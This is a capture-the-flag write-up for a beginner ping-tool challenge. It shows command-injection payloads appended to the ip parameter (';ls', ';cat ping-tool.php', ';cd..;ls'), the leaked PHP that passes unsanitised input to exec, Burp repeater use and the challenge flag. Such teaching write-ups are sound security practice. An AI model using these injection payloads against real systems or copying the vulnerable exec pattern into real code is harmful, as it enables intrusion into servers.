Ryan CTF is a nicely organized beginner CTF located at http://ctf.ryanic.com/. Challenges are pretty interesting, with the only thing I disliked being that they are played through a web shell. So let’s start:

(Ab)use the ping-tool.html page on the web server http://ctf.ryanic.com:8080 to find the flag within the Flag.txt file.

When we open the site, we see just a simple form asking us for IP we want to ping. Parameters are passed in GET request so if we wanted to ping google DNS our URL would look like

http://ctf.ryanic.com:8080/ping-tool.php?ip=8.8.8.8

Now one of basic things (as hinted by challenge name) is to test command injection which we can do by adding ;ls and checking the results:

ING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 
64 bytes from 8.8.8.8: icmp_seq=1 ttl=51 time=1.08 ms 
64 bytes from 8.8.8.8: icmp_seq=2 ttl=51 time=0.493 ms 
64 bytes from 8.8.8.8: icmp_seq=3 ttl=51 time=0.399 ms 
64 bytes from 8.8.8.8: icmp_seq=4 ttl=51 time=0.418 ms 

--- 8.8.8.8 ping statistics --- 
4 packets transmitted, 4 received, 0% packet loss, time 3042ms 
rtt min/avg/max/mdev = 0.399/0.598/1.085/0.284 ms 
index.php 
logo.png 
ping-tool.html 
ping-tool.php 
secret.html 
test.txt 
x.txt

Now for fun, we can also leak the code of this .php script running on the server with

http://ctf.ryanic.com:8080/ping-tool.php?ip=8.8.8.8;cat+ping-tool.php

Here it is just important to note that we need to URL encode parameters so for example in case above space is replaced by + .

And we get:

<?
$out = array();
exec("ping -c 4 " . $_GET["ip"], $out);
foreach($out as $line) {
echo "$line
";
}
?> 

Now for the remaining part, we need to find the flag. We can do this just through a browser but also we can do it through burp, to make it easier and it is a good tool to know.

We need to capture one of request we send to server and forward it to the repeater, in this way we can quickly modify parameters of request and URL encode them. For this, we just need to start burp, turn the intercept on and set the browser to use a proxy (in case of burp localhost on the port 8080 by default).

First I tried running find for the flag, which failed for some reason so I decided to simply check directories bellow our current one.

ping ls

Parameters of the request, if URL decoded, are simply ;cd..;ls. And it seems we were in luck since Flag.txt is just one sub-directory bellow. We simply cat Flag.txt and that’s it.

Flag: pluripresence

- F3real